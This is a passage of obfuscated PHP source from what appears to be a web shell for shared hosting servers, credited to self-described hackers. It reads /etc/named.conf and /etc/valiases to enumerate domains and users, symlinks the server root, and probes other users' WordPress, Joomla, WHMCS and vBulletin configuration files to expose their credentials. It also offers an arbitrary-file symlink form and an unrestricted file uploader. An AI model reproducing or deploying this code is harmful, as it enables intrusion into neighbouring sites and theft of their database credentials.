157                             $IIIIIIIII11l = $IIIIIIIII11I[0];
158                             $IIIIIIIII111 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/blog/wp-config.php';
159                             $IIIIIIIIlIII = get_headers($IIIIIIIII111);
160                             $IIIIIIIIlIIl = $IIIIIIIIlIII[0];
161                             $IIIIIIIIlII1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/configuration.php';
162                             $IIIIIIIIlIlI = get_headers($IIIIIIIIlII1);
163                             $IIIIIIIIlIll = $IIIIIIIIlIlI[0];
164                             $IIIIIIIIlIl1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/joomla/configuration.php';
165                             $IIIIIIIIlI1I = get_headers($IIIIIIIIlIl1);
166                             $IIIIIIIIlI1l = $IIIIIIIIlI1I[0];
167                             $IIIIIIIIlI11 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/includes/config.php';
168                             $IIIIIIIIllII = get_headers($IIIIIIIIlI11);
169                             $IIIIIIIIllIl = $IIIIIIIIllII[0];
170                             $IIIIIIIIllI1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/vb/includes/config.php';
171                             $IIIIIIIIlllI = get_headers($IIIIIIIIllI1);
172                             $IIIIIIIIllll = $IIIIIIIIlllI[0];
173                             $IIIIIIIIlll1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/forum/includes/config.php';
174                             $IIIIIIIIll1I = get_headers($IIIIIIIIlll1);
175                             $IIIIIIIIll1l = $IIIIIIIIll1I[0];
176                             $IIIIIIIIll11 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . 'public_html/clients/configuration.php';
177                             $IIIIIIIIl1II = get_headers($IIIIIIIIll11);
178                             $IIIIIIIIl1Il = $IIIIIIIIl1II[0];
179                             $IIIIIIIIl1I1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/support/configuration.php';
180                             $IIIIIIIIl1II = get_headers($IIIIIIIIl1I1);
181                             $IIIIIIIIl1lI = $IIIIIIIIl1II[0];
182                             $IIIIIIIIl1ll = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/client/configuration.php';
183                             $IIIIIIIIl1l1 = get_headers($IIIIIIIIl1ll);
184                             $IIIIIIIIl11I = $IIIIIIIIl1l1[0];
185                             $IIIIIIIIl11l = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/submitticket.php';
186                             $IIIIIIIIl111 = get_headers($IIIIIIIIl11l);
187                             $IIIIIIII1III = $IIIIIIIIl111[0];
188                             $IIIIIIII1IIl = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/client/configuration.php';
189                             $IIIIIIII1II1 = get_headers($IIIIIIII1IIl);
190                             $IIIIIIII1IlI = $IIIIIIII1II1[0];
191                             $IIIIIIII1Ill = strpos($IIIIIIIII11l, '200');
192                             $IIIIIIII1I1I = '&nbsp;';
193                             if (strpos($IIIIIIIII11l, '200') == true) {
194                                 $IIIIIIII1I1I = "<a href='" . $IIIIIIIII1l1 . "' target='_blank'>Wordpress</a>";
195                             } elseif (strpos($IIIIIIIIlIIl, '200') == true) {
196                                 $IIIIIIII1I1I = "<a href='" . $IIIIIIIII111 . "' target='_blank'>Wordpress</a>";
197                             } elseif (strpos($IIIIIIIIlIll, '200') == true and strpos($IIIIIIII1III, '200') == true) {
198                                 $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl11l . "' target='_blank'>WHMCS</a>";
199                             } elseif (strpos($IIIIIIIIl1lI, '200') == true) {
200                                 $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl1I1 . "' target='_blank'>WHMCS</a>";
201                             } elseif (strpos($IIIIIIIIl11I, '200') == true) {
202                                 $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl1ll . "' target='_blank'>WHMCS</a>";
203                             } elseif (strpos($IIIIIIIIlIll, '200') == true) {
204                                 $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlII1 . "' target='_blank'>Joomla</a>";
205                             } elseif (strpos($IIIIIIIIlI1l, '200') == true) {
206                                 $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlIl1 . "' target='_blank'>Joomla</a>";
207                             } elseif (strpos($IIIIIIIIllIl, '200') == true) {
208                                 $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlI11 . "' target='_blank'>vBulletin</a>";
209                             } elseif (strpos($IIIIIIIIllll, '200') == true) {
210                                 $IIIIIIII1I1I = " <a href='" . $IIIIIIIIllI1 . "' target='_blank'>vBulletin</a>";
211                             } elseif (strpos($IIIIIIIIll1l, '200') == true) {
212                                 $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlll1 . "' target='_blank'>vBulletin</a>";
213                             } else {
214                                 continue;
215                             }
216                             $IIIIIIII1I1l = $IIIIIIIII1I1['name'];
217                             echo '<tr><td><a href=http://www.' . $IIIIIIIIIl11[1][0] . '/>' . $IIIIIIIIIl11[1][0] . '</a></td>
218 <td>' . $IIIIIIII1I1I . '</td></tr>';
219                             flush();
220                         }
221                     }
222                 }
223             }
224         break;
225         case 'sym':
226             $IIIIIIIIIllI = @file('/etc/named.conf');
227             if (!$IIIIIIIIIllI) {
228                 die(" can't read /etc/named.conf");
229             } else {
230                 echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
231                 foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) {
232                     if (eregi('zone', $IIIIIIIIIll1)) {
233                         preg_match_all('#zone "(.*)"#', $IIIIIIIIIll1, $IIIIIIIIIl11);
234                         flush();
235                         if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) {
236                             $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/' . $IIIIIIIIIl11[1][0]));
237                             $IIIIIIII1I1l = $IIIIIIIII1I1['name'];
238                             @symlink('/', 'sym/root');
239                             $IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
240                             $IIIIIIII1I11 = '\.ir';
241                             $IIIIIIII1lII = '\.il';
242                             if (eregi("$IIIIIIII1I11", $IIIIIIIIIl11[1][0]) or eregi("$IIIIIIII1lII", $IIIIIIIIIl11[1][0])) {
243                                 $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $IIIIIIIIIl11[1][0] . '</div>';
244                             }
245                             echo "
246 <tr>
247 
248 <td>
249 <div class='dom'><a target='_blank' href=http://www." . $IIIIIIIIIl11[1][0] . '/>' . $IIIIIIII1I1l . ' </a> </div>
250 </td>
251 
252 
253 <td>
254 ' . $IIIIIIIII1I1['name'] . "
255 </td>
256 
257 
258 
259 
260 
261 
262 <td>
263 <a href='sym/root/home/" . $IIIIIIIII1I1['name'] . "/public_html' target='_blank'>symlink </a>
264 </td>
265 
266 
267 </tr></div> ";
268                             flush();
269                         }
270                     }
271                 }
272             }
273         break;
274         case 'file':
275             echo '
276 The file path to symlink
277 
278 <br /><br />
279 <form method="post">
280 <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
281 <input type="text" name="symfile" value="file.name_sym ( Ex. :: 1.txt )" size="60"/><br /><br />
282 <input type="submit" value="symlink" name="symlink" /> <br /><br />
283 
284 
285 
286 </form>
287 ';
288             $IIIIIIII1lIl = $_POST['file'];
289             $symfile = $_POST['symfile'];
290             $symlink = $_POST['symlink'];
291             if ($symlink) {
292                 @symlink("$IIIIIIII1lIl", "sym/$symfile");
293                 echo '<br /><a target="_blank" href="sym/' . $symfile . '" >' . $symfile . '</a>';
294             }
295         break;
296         default:
297             header("Location: $IIIIIIIIIlIl");
298     }
299 } else {
300     echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
301     echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
302     if ($_POST['_upl'] == 'Upload') {
303         if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
304             echo '<br /><br /><b>Uploaded successful !!<br><br>';
305         } else {
306             echo '<br /><br />Not uploaded !!<br><br>';
307         }
308     }
309     echo '
310 <br /><br /><div class="fot">Cod3d by Mr.Alsa3ek and Al-Swisre
311 <br /><br />
312 Muslims Hackers</div> ';
313 };
314 echo '
315 </div>
316 </body>
317 </html>
318 ';